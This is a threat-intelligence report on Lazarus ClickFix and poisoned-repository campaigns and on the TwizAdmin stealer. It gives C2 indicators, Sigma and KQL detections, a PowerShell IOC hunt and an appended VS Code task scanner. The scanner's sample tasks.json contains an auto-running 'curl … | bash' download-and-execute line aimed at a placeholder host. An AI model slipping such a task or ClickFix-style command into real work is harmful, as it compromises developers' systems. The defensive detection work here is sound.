Excerpt
Active campaigns target Finance/Tech with macOS ClickFix malware, dev supply chain compromise, and multi-stage crypto-stealers.
Threat Summary
Recent intelligence reveals a convergence of sophisticated APT activity targeting the Technology and Finance sectors. The Lazarus Group (tracked as Void Dokkaebi/WageMole) is executing dual-pronged operations: a social engineering campaign leveraging "ClickFix" techniques to deliver the Mach-O Man malware to macOS users, and a supply chain attack using fake job interviews to poison code repositories (DEV#POPPER RAT). Simultaneously, the DataBreachPlus actor is pushing the TwizAdmin suite, a modular threat featuring crypto-clippers, ransomware (crpx0), and a Java RAT, targeting both Windows and macOS users via shipping lures. Collectively, these campaigns emphasize credential theft, financial compromise, and persistent access through developer environments.
Threat Actor / Malware Profile
Lazarus Group (WageMole / Void Dokkaebi)
Malware Families: Mach-O Man, PyLangGhostRAT, DEV#POPPER RAT, InvisibleFerret, BeaverTail.
Distribution:
- ClickFix: Fake meeting invitations via Telegram redirect to fraudulent collaboration sites (Zoom/Teams). Victims are tricked into running terminal commands to "fix" connection issues, executing the malware.
- Supply Chain: Fake job interviews lure developers into cloning malicious Git repositories. Malicious VS Code task configurations execute payloads upon opening the project.
Behavior:
- Mach-O Man: Steals browser data and credentials, exfiltrating via Telegram. Uses Python-based RAT capabilities.
- Dev Targeting: Self-propagates through repository tampering. Focuses on stealing blockchain infrastructure credentials and developer tokens.
DataBreachPlus
Malware Families: TwizAdmin, crpx0.
Distribution: Phishing campaigns impersonating logistics entities (e.g., FedEx).
Behavior:
- Multi-Stage: Begins as a clipboard hijacker for 8+ cryptocurrency chains. Escalates to BIP-39 seed phrase theft and browser credential exfiltration.
- Ransomware: Deploys the crpx0 ransomware module.
- C2: Managed via a FastAPI-based panel at 103.241.66[.]238:1337 with a license key system. Utilizes a Java RAT for remote access.
IOC Analysis
The current indicator set reveals a multi-faceted infrastructure:
- Network Infrastructure: Actors are utilizing specific IP blocks (e.g., 166.88.4.2, 23.27.20.143) likely hosting C2 nodes. The TwizAdmin operation specifically uses port 1337 for C2.
- Typosquatting: The domain livemicrosft.com is used in the ClickFix campaign to impersonate Microsoft.
- File Payloads: A high volume of SHA256 hashes corresponds to Mach-O binaries (macOS) and Windows payloads.
Operational Guidance: SOC teams should immediately block the listed IPs and domains at the perimeter. EDR solutions should be configured to quarantine files matching the provided hashes. Because the C2 channels use a non-standard port (1337) and legitimate platforms (Telegram), network detection must rely on behavioral anomalies rather than simple port blocking.
Detection Engineering
Sigma Rules
---
title: Potential macOS ClickFix Activity via Terminal
id: 4a8b1c9d-5e6f-4a3b-8c9d-1e2f3a4b5c6d
description: Detects execution of curl or bash commands spawned by communication applications or browsers, indicative of ClickFix social engineering attacks.
author: Security Arsenal
date: 2026/04/23
status: experimental
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        ParentImage|endswith:
            - '/Telegram'
            - '/Teams'
            - '/Zoom'
            - '/Google Chrome'
            - '/Safari'
    selection_cli:
        Image|endswith:
            - '/bash'
            - '/sh'
            - '/curl'
            - '/osascript'
        CommandLine|contains:
            - 'curl'
            - 'bash -c'
    condition: selection and selection_cli
falsepositives:
    - Legitimate developer workflows (rare when initiated by chat apps)
level: high
---
title: VS Code Supply Chain Compromise via Tasks
id: 7d8e9f0a-1b2c-3d4e-5f6a-7b8c9d0e1f2a
description: Detects execution of suspicious child processes by VS Code, often associated with malicious task configurations in poisoned repositories.
author: Security Arsenal
date: 2026/04/23
status: experimental
references:
    - https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: process_creation
detection:
    selection:
        ParentImage|contains:
            - 'Code.exe'
            - 'Visual Studio Code'
        Image|endswith:
            - '/node'
            - '/python'
            - '/bash'
            - '/powershell.exe'
            - '/cmd.exe'
            - '/wget'
    filter:
        CommandLine|contains:
            - 'git '
            - 'npm install'
            - 'npm run'
    condition: selection and not filter
falsepositives:
    - Legitimate build tasks and extension usage
level: medium
---
title: TwizAdmin Java RAT C2 Communication
id: 2b3c4d5e-6f7a-8b9c-0d1e-2f3a4b5c6d7e
description: Detects Java processes initiating network connections to non-standard ports or specific C2 infrastructure associated with TwizAdmin.
author: Security Arsenal
date: 2026/04/23
status: experimental
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
detection:
    selection:
        Image|endswith:
            - '\java.exe'
            - '\javaw.exe'
            - '/java'
        # DestinationPort is numeric in Sigma; match the port values directly rather than a ':1337' string suffix
        DestinationPort:
            - 1337
            - 8080
            - 4444
        Initiated: 'true'
    condition: selection
falsepositives:
    - Legitimate Java application servers on non-standard ports
level: high
KQL (Microsoft Sentinel)
// Hunt for ClickFix patterns: Terminal commands launched by Chat/Browsers (Windows and macOS process names)
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName in~ ('Teams.exe', 'Telegram.exe', 'Zoom.exe', 'chrome.exe', 'msedge.exe', 'Microsoft Teams', 'Telegram', 'zoom.us', 'Google Chrome', 'Safari')
| where ProcessFileName in~ ('bash.exe', 'powershell.exe', 'cmd.exe', 'curl.exe', 'bash', 'sh', 'zsh', 'curl', 'osascript')
// DeviceProcessEvents exposes the command line as ProcessCommandLine, not CommandLine
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessFileName, ProcessCommandLine
| order by Timestamp desc
// Hunt for C2 Connections related to Void Dokkaebi and TwizAdmin
DeviceNetworkEvents
| where Timestamp >= ago(7d)
| where RemoteIP has_any ('31.31.198.206', '166.88.4.2', '85.239.62.36', '23.27.20.143', '154.91.0.196', '198.105.127.210') or RemoteUrl in~ ('livemicrosft.com', 'fanonlyatn.xyz')
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, RemotePort, InitiatingProcessFileName
| order by Timestamp desc
PowerShell IOC Hunt Script
# IOC Hunt for TwizAdmin and Void Dokkaebi Infrastructure
# Checks active network connections for known malicious IPs
$MaliciousIPs = @(
    '31.31.198.206',
    '166.88.4.2',
    '85.239.62.36',
    '23.27.20.143',
    '23.27.202.27',
    '23.27.120.142',
    '154.91.0.196',
    '198.105.127.210',
    '83.168.68.219'
)

Write-Host "Checking for active connections to known IOCs..." -ForegroundColor Yellow
$ActiveConnections = Get-NetTCPConnection -State Established |
    Where-Object { $MaliciousIPs -contains $_.RemoteAddress }

if ($ActiveConnections) {
    Write-Host "WARNING: Found active connections to malicious infrastructure:" -ForegroundColor Red
    foreach ($Conn in $ActiveConnections) {
        # Resolve the owning process so the analyst can pivot from the socket to the binary
        $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
        [PSCustomObject]@{
            LocalAddress  = $Conn.LocalAddress
            LocalPort     = $Conn.LocalPort
            RemoteAddress = $Conn.RemoteAddress
            RemotePort    = $Conn.RemotePort
            ProcessName   = $Process.ProcessName
            PID           = $Conn.OwningProcess
        } | Format-List
    }
} else {
    Write-Host "No active connections to listed IPs found." -ForegroundColor Green
}

# Check for presence of suspicious domains in DNS Cache (Best Effort)
Write-Host "Checking DNS Cache for suspicious domains..." -ForegroundColor Yellow
$SuspiciousDomains = @('livemicrosft.com', 'fanonlyatn.xyz')
Get-DnsClientCache | Where-Object { $SuspiciousDomains -contains $_.Entry } | Select-Object Entry, Data, TimeToLive
Response Priorities
Immediate:
- Block all listed IPv4 addresses and domains (fanonlyatn.xyz, livemicrosft.com) at the firewall and proxy level.
- Quarantine endpoints matching the provided file hashes.
- Hunt for VS Code tasks in developer environments that execute scripts on window.onload.
24h:
- Initiate credential rotation for developers and finance staff who may have been targeted by Mach-O Man or TwizAdmin.
- Review browser history and extensions on macOS endpoints for signs of "ClickFix" interaction (visiting fake meeting links).
- Audit git repositories for recent commits from unknown contributors or suspicious CI/CD pipeline changes.
1 week:
- Harden developer environments: Restrict VS Code workspace trust and disable automatic task execution.
- Conduct security awareness training specifically focused on "ClickFix" social engineering (fake browser errors requiring terminal commands).
- Implement YARA rules for the detection of Mach-O binaries and Python-based packagers.
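The VS Code task check behind the hunt and hardening steps above, as an added example that is not part of this report: it parses a repository's .vscode/tasks.json and flags tasks that run automatically on folder open or whose command line downloads and pipes into a shell. The regex heuristics, function names and the embedded tasks.json are constructed assumptions, not indicators from the report.

```python
import json
import re

# Added example (not from the report): scan a cloned repository's .vscode/tasks.json
# for tasks that auto-run when the folder opens (the trigger the report attributes to
# the poisoned repositories). Regexes are heuristics; the sample below is constructed.
AUTO_RUN_TRIGGERS = {"folderOpen"}
SUSPICIOUS_CMD = re.compile(
    r"(curl|wget)\s[^|]*\|\s*(ba|z)?sh\b|base64\s+(-d|--decode)|\bosascript\b"
    r"|python3?\s+-c\s|Invoke-Expression|\biex\b|powershell(\.exe)?\s+-e(nc)?\b",
    re.IGNORECASE)

def load_jsonc(text: str) -> dict:
    """tasks.json is JSON-with-comments: drop full-line // comments and trailing commas."""
    text = re.sub(r"^[ \t]*//.*$", "", text, flags=re.MULTILINE)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)

def task_command(task: dict) -> str:
    """Join command and args roughly the way the shell would see them."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(parts).strip()

def scan_tasks(text: str) -> list[dict]:
    """Return one finding per task that auto-runs or has a suspicious command line."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        run_on = task.get("runOptions", {}).get("runOn")
        cmd = task_command(task)
        auto_run = run_on in AUTO_RUN_TRIGGERS
        suspicious = bool(SUSPICIOUS_CMD.search(cmd))
        if auto_run or suspicious:
            findings.append({"label": task.get("label", "<unnamed>"), "auto_run": auto_run,
                             "suspicious_command": suspicious, "command": cmd})
    return findings

# Constructed sample: one benign build task, one auto-running download-and-execute task.
SAMPLE_TASKS_JSON = """{
  // constructed for this example
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "command": "curl",
     "args": ["-s", "https://example.invalid/init.sh", "|", "bash"],
     "runOptions": {"runOn": "folderOpen"}},
  ]
}"""

if __name__ == "__main__":
    print(scan_tasks(SAMPLE_TASKS_JSON))
```

Run it against every .vscode/tasks.json in a freshly cloned repository before opening the folder in VS Code; a task that auto-runs but has a benign-looking command still deserves a manual look, since the heuristics only cover common download-and-execute shapes.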